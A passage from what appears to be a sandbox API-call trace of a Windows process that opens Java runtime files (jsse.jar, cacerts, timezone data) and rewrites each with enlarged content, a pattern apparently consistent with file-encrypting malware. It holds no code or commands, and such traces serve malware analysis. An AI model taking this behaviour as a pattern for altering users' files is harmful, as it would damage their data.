lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x809cb [0128.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.166] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.167] ReleaseMutex (hMutex=0x168) returned 1 [0128.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsse.jar", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0128.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsse.jar", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsse.jar", lpUsedDefaultChar=0x0) returned 8 [0128.167] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.688] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.689] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7f9cb [0128.689] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.692] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7f9cb [0128.692] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.693] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0128.693] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.693] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.693] CloseHandle (hObject=0x1cc) returned 1 [0128.694] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.695] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.695] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x88e [0128.695] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.696] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.696] ReleaseMutex (hMutex=0x168) returned 1 [0128.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meta-index", lpUsedDefaultChar=0x0) returned 10 [0128.696] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x88e, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x331f2bc*=0x88e, lpOverlapped=0x0) returned 1 [0128.698] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.698] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xe16, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x331f2d0*=0xe16, lpOverlapped=0x0) returned 1 [0128.699] CloseHandle (hObject=0x1cc) returned 1 [0128.699] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.701] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.701] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1429a [0128.701] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.701] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.701] ReleaseMutex (hMutex=0x168) returned 1 [0128.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cacerts", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0128.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cacerts", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cacerts", lpUsedDefaultChar=0x0) returned 7 [0128.702] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0128.703] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1329a [0128.704] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.704] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1329a [0128.705] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.705] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0128.705] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0128.705] CloseHandle (hObject=0x1cc) returned 1 [0128.705] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.707] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.707] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1fca [0128.707] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.707] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.707] ReleaseMutex (hMutex=0x168) returned 1 [0128.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzmappings", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tzmappings", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tzmappings", lpUsedDefaultChar=0x0) returned 10 [0128.708] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1fca, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x331f2bc*=0x1fca, lpOverlapped=0x0) returned 1 [0128.710] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.710] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2552, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x331f2d0*=0x2552, lpOverlapped=0x0) returned 1 [0128.711] CloseHandle (hObject=0x1cc) returned 1 [0128.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4d [0128.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.712] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.713] ReleaseMutex (hMutex=0x168) returned 1 [0128.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Banjul", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Banjul", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Banjul", lpUsedDefaultChar=0x0) returned 6 [0128.713] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fb88, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fb88*, lpNumberOfBytesRead=0x331f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0128.714] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.714] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0128.714] CloseHandle (hObject=0x1cc) returned 1 [0128.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x55 [0128.716] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.716] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.716] ReleaseMutex (hMutex=0x168) returned 1 [0128.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Conakry", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0128.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Conakry", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Conakry", lpUsedDefaultChar=0x0) returned 7 [0128.716] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x331f2bc*=0x55, lpOverlapped=0x0) returned 1 [0128.717] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.718] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0128.718] CloseHandle (hObject=0x1cc) returned 1 [0128.718] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.719] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.719] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0128.719] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.719] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.720] ReleaseMutex (hMutex=0x168) returned 1 [0128.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Harare", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Harare", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Harare", lpUsedDefaultChar=0x0) returned 6 [0128.720] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0128.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.721] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0128.721] CloseHandle (hObject=0x1cc) returned 1 [0128.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.722] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.722] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0128.723] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.723] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.723] ReleaseMutex (hMutex=0x168) returned 1 [0128.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Libreville", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Libreville", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Libreville", lpUsedDefaultChar=0x0) returned 10 [0128.723] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0128.724] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.724] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0128.725] CloseHandle (hObject=0x1cc) returned 1 [0128.725] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.725] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.726] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0128.726] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.726] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.726] ReleaseMutex (hMutex=0x168) returned 1 [0128.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mbabane", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0128.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mbabane", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mbabane", lpUsedDefaultChar=0x0) returned 7 [0128.726] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0128.727] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.727] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0128.728] CloseHandle (hObject=0x1cc) returned 1 [0128.728] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.728] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.728] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4d [0128.729] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.729] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.189] ReleaseMutex (hMutex=0x168) returned 1 [0129.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Porto-Novo", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Porto-Novo", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Porto-Novo", lpUsedDefaultChar=0x0) returned 10 [0129.189] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fd08, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd08*, lpNumberOfBytesRead=0x331f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0129.191] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0129.191] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0129.191] CloseHandle (hObject=0x1cc) returned 1 [0129.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0129.277] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 